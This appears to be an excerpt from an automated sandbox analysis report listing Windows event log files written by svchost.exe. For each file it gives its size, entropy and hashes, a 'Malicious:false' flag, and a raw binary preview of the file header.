                                                                                                                                                                                                                                              SHA-512:9E5D104332631EDBCB8AF55BCEA2CD7B7EB34A0FE1DF226579E005A775840CDF05C86CCBEF902730138ED1A27347B4FB070FAF37046320740009CC11BAC11C33
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........'...............'...................u..4.................................................................... ...........................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**...............h{.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.217583590897775
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:3hUIpGcRpDvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBD:3YDoh1VLBCVz6t0o3ZeF9UBlG
                                                                                                                                                                                                                                              MD5:C5BB06A11AA8E33C5D2512146A14F414
                                                                                                                                                                                                                                              SHA1:BCA1D0ABD07806B4DDB34B4483B04B57A840CC26
                                                                                                                                                                                                                                              SHA-256:5A42653C87D73E415D15B08AE3511312F991238224022920D85CDEE43316C64A
                                                                                                                                                                                                                                              SHA-512:8FE28DAC0CEB3BBB462390492FA7623077448CCD58E04EE38C6CE9FF92FAD6647176DD61A628A4C03C3C5DEE9912D67375AE77865DE52D23B2B253C01C43FC86
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................P......a.................................................................... ..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..............T.0.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.1666137709834492
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:uwhwCCRzCaCkClCzCYC/CyCVCGCMCvCzCw9CdqCVCICsC:uwKFT
                                                                                                                                                                                                                                              MD5:88E290384531AC91E63C802B158E726D
                                                                                                                                                                                                                                              SHA1:2AFD218C14B290A33DC27B0BDBA87AADFD428D9B
                                                                                                                                                                                                                                              SHA-256:36B48D00709B0F3B917927DE97D395C4785F6A7B61CCC5C72C799C4521FD9D97
                                                                                                                                                                                                                                              SHA-512:7969E4BDC2659D8412FD187135AB04B329AE134E2A5E386D86BA0E490F979621DCE05DF1118FA31987CB5FD27CB964773F4A67D6884002F7E9579A752E5A2AAD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................84..p6..........................................................................Pl..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................v)........................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):85048
                                                                                                                                                                                                                                              Entropy (8bit):4.50237734622881
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:2/MtY3MtYYMRYriMRYHMRYhfhEKKeKSrlKvKe2KrK6KPMchYCMtY3MtYYMRYriMn:2ZfuWrN5xh9AaBDuWrNobHH
                                                                                                                                                                                                                                              MD5:34ABBE13552D9CC1D166D45B051119A6
                                                                                                                                                                                                                                              SHA1:88E870D4ECB53B6A0BBCC5E03F97E8797CE1BE9A
                                                                                                                                                                                                                                              SHA-256:63895472B8FD7ED67870809E3FEEDB1D3796D53582C3E9550F32E59FC09FC524
                                                                                                                                                                                                                                              SHA-512:634CEF8E2D975BE183470F123E3D4FC4755E3B51EC20AC298916701CBB0D53C78B82D1E2CE7874A2DD2B9F8571621BDF06F7677DBC46E74A81BB689471988DED
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.33......?3......33......?3..........@(...*..m........................................................................Wd................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&.......................K.......................................................**......;3........z7a...........E!&.......................................................................F...9.!...A.A.............z7a......`...9..`...........;3...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......................I.......S.k.i.p.p.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r.:. .P.F.N. .M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.1.0...1.9.0.6...2.1.8.2...0._.x.6.4

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):79024
                                                                                                                                                                                                                                              Entropy (8bit):1.8245847671674706
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:yBhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmIUmxjUmLUmSUUShL6UsE0ZG:qY7LRqSY7LRq
                                                                                                                                                                                                                                              MD5:1408CC66C29A577F12E51C0D54738341
                                                                                                                                                                                                                                              SHA1:D9E528D783272827AB0E6F14E5E35EABE7303500
                                                                                                                                                                                                                                              SHA-256:2F463EEB4FC1FB46D60D11C8E5C4CC59B82EA6C128E7E972A2F5C1EC72FA661E
                                                                                                                                                                                                                                              SHA-512:254EF2EA8DAB94AE9B7F8260481C4EB7C1889A09D0D01573AE794398E7F50B93B9BBE1A174194750D19809B11632D49DFB64430CF5941CB94C5AD1702399630A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..04..M.L......................................................................B.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................*..............................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):67784
                                                                                                                                                                                                                                              Entropy (8bit):0.3676609228742155
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:MBWJrP+yQNRBEZWTENO4bhBkcoyQ/6zkkBWJrP+yQNRBEZWTENO4bhBkcoyQ/6zk:WNVaO8Mcor/6zkkPNVaO8Mcor/6zk
                                                                                                                                                                                                                                              MD5:17009332CF4B3ECB9906C7344368E36F
                                                                                                                                                                                                                                              SHA1:38B820AE6727D6BCA751F6B35B962030BA75BDEC
                                                                                                                                                                                                                                              SHA-256:929282B2BD0465056225B9A39BD63912416E5A274214CA218AF4C0F1DC401502
                                                                                                                                                                                                                                              SHA-512:BEC969114FB7B73B1ACAD7894B94193FB3BC12C3F3B1A598FEC727DB840FB95E0BF530BEA4423B6947BBE6A714A8058F9DC464D99A1B78257F51CCBECE3B8AC8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.............................................p.M.......................................................................G................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**................t7a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.0934111022900845
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:phjivnniDiiuXieuietio0i7riTKhiIViOhin5ibaifiWipiUiKijiTVijiHiBRY:pon6ufC/hCI4MWs8PM9QSp
                                                                                                                                                                                                                                              MD5:C03DC232AFCDF6316B6CC7D1D5266423
                                                                                                                                                                                                                                              SHA1:8B90D640BB1B09E8C61117DE6B00B93CB1FE69A0
                                                                                                                                                                                                                                              SHA-256:198FDBBBC7444C323E7DBFB5B6D5B6AB870587FE7B740A05C22C6821B0508D16
                                                                                                                                                                                                                                              SHA-512:192E77738FC7A6493DFA22C5A56EA01E4A502219756578AE772C4FB0A1074617A21523D1029C6C9DDF15798D0968A0C14C8B723EAB0B91BD01F9967540C04DE9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.y...............y....................x...z..D.......................................................................Hu...................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F....................................................................@...................#..................................w#.......'..............**......y........`0.Y...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Time-Service%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):100392
                                                                                                                                                                                                                                              Entropy (8bit):2.907042076053727
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:uHshamoZqP+INFaQGshamoZqP+INFaQegz:uMhYE7NBBhYE7NBegz
                                                                                                                                                                                                                                              MD5:BE86FBEB673EDA53950280478DA31B2F
                                                                                                                                                                                                                                              SHA1:0899F7D9BCEBCAF5EFF8023ED7B02975BAF9F1E9
                                                                                                                                                                                                                                              SHA-256:37DD319C062C85240EABF4DFA881E296C0D5558DD6AF9CBEB68C2E9A79DCE0B8
                                                                                                                                                                                                                                              SHA-512:11A5C3C60DE46697FB86DF66AE52DE3257634B154195B30C57BB00474A124DBBE01E2DEA2A466912F1C53D9F4BCDB21D6FB55473A957B66795233CE93CDAF8C7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................k...m..q'..........................................................................................6...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................y...........&........0...........%..........................a!..........!F..........................**................r............E!.0..............................................................<.......T...A.!................@..r.......`...Z...`................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.T.i.m.e.-.S.e.r.v.i.c.e.......SN.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.T.i.m.e.-.S.e.r.v.i.c.e./.O.p.e.r.a.t.i.o.n.a.l....%....................................................._..............**..x..............r............E!.0....................................

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):87888
                                                                                                                                                                                                                                              Entropy (8bit):3.620301573920391
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:naDaXaXanabaTanaDavahVaTavanafazavaza/afaXarava/afaLazanafafa8f0:iF
                                                                                                                                                                                                                                              MD5:B9343A3B22E1D7F931AFB7A3F611AAD8
                                                                                                                                                                                                                                              SHA1:DF7ADEFECB837E36F1489EEB8ACAB0ACC4D76660
                                                                                                                                                                                                                                              SHA-256:6A1EDBEBBE7A67D8CA3F3246C83B0EB84382A09B8DE246C6FD3FCB032A8B8289
                                                                                                                                                                                                                                              SHA-512:D836F35D820B47C582AB191752E41E41E8CA6F3D64C38D31BACAC1A9ED904BF488490CF3708C8B9D31C30029AD8CBC544BC4B0D6314964F93EC5D6B411A6D8D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........@...............@...............h.....1......................................................................o5.................h...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................................A...................................**......#..........6a...........E!&...............................................................P.......h...C.!....................6a...`.j.......i............#........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.U.A.C.-.F.i.l.e.V.i.r.t.u.a.l.i.z.a.t.i.o.n.+.*.N.ID.v...W^.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.U.A.C.-.F.i.l.e.V.i.r.t.u.a.l.i.z.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l...7..{A.......................r.......~...........................$.N......9.\.D.e.v.i

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.4157482482643835
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:8haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJgXJRpXJBgXJQXJBvXJnXJSc:8Q0yUkNYwD8imLEoRfBoYb5GO
                                                                                                                                                                                                                                              MD5:A886E83D1948FFB2BF4A2B744DDCCBD3
                                                                                                                                                                                                                                              SHA1:0074C53E8984FB0024DE0485447D3E1081B34D0B
                                                                                                                                                                                                                                              SHA-256:6DD70CE24E770699A142E13D62B090F64E00CD0A8501FC2D31E0ED5F9DFAB004
                                                                                                                                                                                                                                              SHA-512:3263F89608AEB4140553E587A3946E352391DAAC7DF85ABF0358A39B45103655DAE1DE29616A71142C4BB42FD1C0273F3E3B2F6900CCDE672F36ADBB3F7629D1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................D...G..B.f......................................................................0.................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........3..................................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.342266575776689
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Chbm8mJmAwmsmkmtmZjm9mEJmSmSgmMmJmyFmgmPm4mOmdm9mHbkmzm7m6mBmdmv:CA74DcxI1c8PF
                                                                                                                                                                                                                                              MD5:302AE7C3FB3FBC33D19DBFB4CA97D867
                                                                                                                                                                                                                                              SHA1:86165BE8A181F1DE44CC86F75E36890C0379AB94
                                                                                                                                                                                                                                              SHA-256:1183791BE47DD2268E48827BC2B2F8D2F50C6265AF23904E15E35A8A4715B3DB
                                                                                                                                                                                                                                              SHA-512:AEE86973AE3C7844DF4EAA3406ECCF1AD59EF458F1623A35B84246B26C83229441B76C64A2502D2F9EF298DAF450D0069C6180A99B041A1D2B9DAD57B6F8A816
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................6..P8...P\<........................................................................................R.......................z...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........;...........+.......................................................**...............21.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.711346426112008
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:7V7rDiDxFYzDiDPDiDfDiDDDiDxDiDUDiDgDiDsDiDQDiDEDiDYDiDEDiD:7hr2ts2T2z2n2N2w202w2M2Y2E2I2
                                                                                                                                                                                                                                              MD5:F911674F42FFA9096A39B15D79861134
                                                                                                                                                                                                                                              SHA1:14C46673DAB47906E3693ABC048CD0C2FADBECB6
                                                                                                                                                                                                                                              SHA-256:1668A045EF7528D741AAD61574F673D564D9BC7831A57FB6CD4A4D25C3FCA4B5
                                                                                                                                                                                                                                              SHA-512:2341C1145DCD1E714D0A16CFE517CCD8F0BF6F94A45882A4142B2D90B27A1ACD4F4508AF7E49A52B0B0F2E418EEC461EF2CBB0463D48CC48E08E6880A617B442
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk................................................(....................................................................4.KU................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F...............................-...................................&...............................................................................**..............IL..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 12, DIRTY
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                              Entropy (8bit):1.280764959338057
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:YBEpP9JcY6+g4+Ga6oK6xIb13xIb13xIt13xI:YSpP9JcY6+g4+Ga6
                                                                                                                                                                                                                                              MD5:C8FCA63C61F0E6CD434363A4CBDFD2CC
                                                                                                                                                                                                                                              SHA1:743C9873E8480617F3DF3ADC8B788E7585E58339
                                                                                                                                                                                                                                              SHA-256:E7301A66D316399F9FC4F0B324858FE054CA52E541B8C0D1A588F6E9BECDC649
                                                                                                                                                                                                                                              SHA-512:3FA59744D9E831A82F0862A21B76C35FB14848FEF360AF76BFCB7CE8EB130D7A6C8129C3093A982D401A9C6408F6871567D58A8F9BD57C9CC0DA821EAC093A0B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.....................................................................................................................[...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):67240
                                                                                                                                                                                                                                              Entropy (8bit):3.847206680706363
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:cqR5HBh7RucVRDRbR2R3RgRxR5RrGRRrRuRVRERfRzRwRQRoRTyDR6RQR36RMGRk:c0BNzUhK32
                                                                                                                                                                                                                                              MD5:0718DF1A2F5F0D1C247B6895C8F52BE0
                                                                                                                                                                                                                                              SHA1:F70884DAA8349236B9A9DDFF3EF9546CB00347B2
                                                                                                                                                                                                                                              SHA-256:4217E04C60222BD78ACF5B9DE47194A760643EBEC8FA1ADCBFC6C050E9627927
                                                                                                                                                                                                                                              SHA-512:C06868BC9A555849441AD730378F739785A1688F0A386591F15392DC2165A7D7E4188E0E0EED161B6E00D378DAFC7ACF6BC726095491FBCB4A0CA687F37F0093
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.:.......v.......:.......v...................%.n&........................................................................................................F.......|...=.......................................`.......................u...-......................................................f...b..........?.......................`.......A.......G.......M...F.......................................................................................&...........9.......9.......................................**......v........5p...........^..&...............................................................<.......T...J.!................@.5p.......`...Z...`.......P...v....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l....s..9...0....s...q.\......&./.......A..#...`...........O.p.e.r.a.t.i.o.n._.T.e.m.p.o.r.a.r.y.E.s.s.S.t.a.r.t.e.d...o....j.....3.h.t.t.p.:././.m

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.260359446709512
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:fhRhwhdhP0h9hzehShchawhZh4hhhshphihXhMhxhzhwhohGh5h3hShChWhzhLh4:fmFpkBzBiELmn
                                                                                                                                                                                                                                              MD5:067AD5BE5D9DAC2F9972EA7CCD899B43
                                                                                                                                                                                                                                              SHA1:EDD013A75A95D510CCEBA7DF86938621FA17E518
                                                                                                                                                                                                                                              SHA-256:EE5349F31C79D30F8AB2023451ECC640BD33C7F038ED6951D0F9FF2FE82BA0E7
                                                                                                                                                                                                                                              SHA-512:F2E20C281CD6E14FBDDCE8C89055CF5BC6A3C79E5D65037B269B11F2500E750A15998C9A29365F7D5903E4CF568EA45026E9F340A0318C212E8AD936EA2B3F65
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................`...........................................................................3i._........................................@...=...........................................................................................................................f...............?...........................m...................M...F...........................................i.......................&.......................................................y.......................**................9.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.2594795605878295
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:LhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVHV7Vj0V1VXFVq:LyjbPac
                                                                                                                                                                                                                                              MD5:33C02B19501869BF7DF6F6BF1D2E6BF6
                                                                                                                                                                                                                                              SHA1:D90AF4BD50FE734A1E74ACC4E0704FEE1346F8D4
                                                                                                                                                                                                                                              SHA-256:6453729FD9D539566FC7AA3CE013B958C237E0E713AA917444F453C02A96F3BB
                                                                                                                                                                                                                                              SHA-512:B4D4A162E59651477CE87DE756F9DBD7634A206CA7FA83CA61DD73F86CAE343083AFF067A981DE096AAB1AE6997E599397E4851648800B2BCDAA6E5BAC0797A8
                                                                                                                                                                                                                                              Malicious:false
